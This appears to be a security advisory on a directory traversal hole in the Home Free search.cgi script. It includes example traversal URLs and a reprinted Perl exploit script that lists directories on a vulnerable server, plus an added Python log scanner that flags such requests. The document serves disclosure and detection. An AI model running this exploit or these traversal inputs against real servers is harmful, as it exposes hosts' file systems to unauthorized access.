
Search.cgi Directory traversal vulnerability


Affected Home Free CGI package


    Following   is    based   on    #!/bin/csh   security    advisory.  is  a  vendor  of  Perl  CGI  scripts for all
    platforms that  support the  language (WinNT,  Linux, various Unix
    flavors).   Home  Free  is  a  package  developed  and marketed by, below is an extract from their website.

        "Home  Free  is  the  ultimate  community  building   program.
        Allowing you  to give  your visitors  a free  web site on your
        server.  With complete control over every aspect of your  free
        web site program, you can  grow page views, revenue and  brand
        awareness for your site."

    Home Free is used  by many popular websites.   It allows users  to
    set up and maintain their websites through a series of CGI scripts
    without posing a threat to system security.  Home Free consists of
    the following files from an end-user point of view:


    There are also  various 'admin' CGI  scripts in the  package, such


    The search.cgi script uses the following input variables:

        letter=any string
        cata=any string
        perpage=any string
        start=any string

    This CGI script can be exploited to view directory listings on the
    host  server.   A  vulnerability  exists  because  of insufficient
    bounds checking  of the  'letter' variable  when it  is parsed  by
    the search.cgi script, for example:\..\..\..\winnt

    The above URL  will list the  \winnt directory of  the host.   The
    search.cgi script also  seems to read  and display the  first line
    of  each  file  (network.wri,  et  al).   Those  who  found   this
    vulnerability have  been unable  to use  the search.cgi  script or
    any of the other scripts in the package to view files to date.

    You can  also exploit  the vulnerability  to view  other directory
    listings, such as the /cgi-bin directory under Apache.\..\..\..\apache\cgi-bin

    #!/bin/csh also took the time to write a short Perl script that
    displays the directory listings of vulnerable servers:

    # Quick exploit of the Home Free ./search.cgi script, allows you to list
    # directories on the host.
    # Default server is antionline's, change as appropriate.
    use IO::Socket;
    if ($ARGV[0] eq "") { die "no argument\n"; }
    $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                  PeerAddr  => "",
                                  PeerPort  => 80) ||
                    die "can't connect to host: $!";
    $| = 1;
    print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
    while(<$asoc>) {
            if ($_ =~ /.+HREF.+TD.+/) {
                    @parts = split("\"", $_);
                    $foo = $parts[1];
                    @parts = split("/", $foo);
                    print STDOUT $parts[3];
                    print STDOUT "\n";
            }
    }
    close($asoc);

    Other smaller  problems were  identified when  testing the  bounds
    checking  and   flexibility  of   the  other   scripts,  such   as
    user_manage.cgi.  Without  access to the  source code of  the Perl
    scripts in  question, it  is very  difficult to  know the security
    implications of such problems.
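
    Added example (not part of the #!/bin/csh advisory or the Home Free
    package): a Python check that scans web-server access logs for requests
    to search.cgi whose 'letter' parameter contains a ".." path segment,
    including percent-encoded and double-encoded forms.  The log lines,
    addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/search.cgi?letter=a&cata=all&start=1&perpage=10 HTTP/1.0" 200 2048
192.0.2.10 - - [01/Jan/2000:10:00:02 +0000] "GET /cgi-bin/search.cgi?letter=a..z&start=1&perpage=10 HTTP/1.0" 200 1990
198.51.100.7 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/search.cgi?letter=..\..\..\..\winnt&start=1&perpage=all HTTP/1.0" 200 9120
198.51.100.7 - - [01/Jan/2000:10:00:09 +0000] "GET /cgi-bin/search.cgi?letter=%2e%2e%5c%2e%2e%5capache%5ccgi-bin HTTP/1.0" 200 4410
198.51.100.7 - - [01/Jan/2000:10:00:12 +0000] "GET /cgi-bin/search.cgi?letter=%252e%252e%255c%252e%252e%255cwinnt HTTP/1.0" 200 9120
'''.strip().splitlines()

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# A ".." path segment delimited by either separator (the advisory's examples use "\").
DOTDOT = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_hits(lines, script="search.cgi", param="letter"):
    """Return (client, status, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qs removes one layer of encoding; fully_decode removes the rest.
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if DOTDOT.search(value):
                hits.append((client, status, value))
    return hits


if __name__ == "__main__":
    for client, status, value in traversal_hits(SAMPLE_LOG):
        print(f"{client} status={status} letter={value!r}")
```

    A 200 status on a flagged request is worth triaging first, since the
    advisory says the script returns the directory listing in its response.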


    Nothing yet.
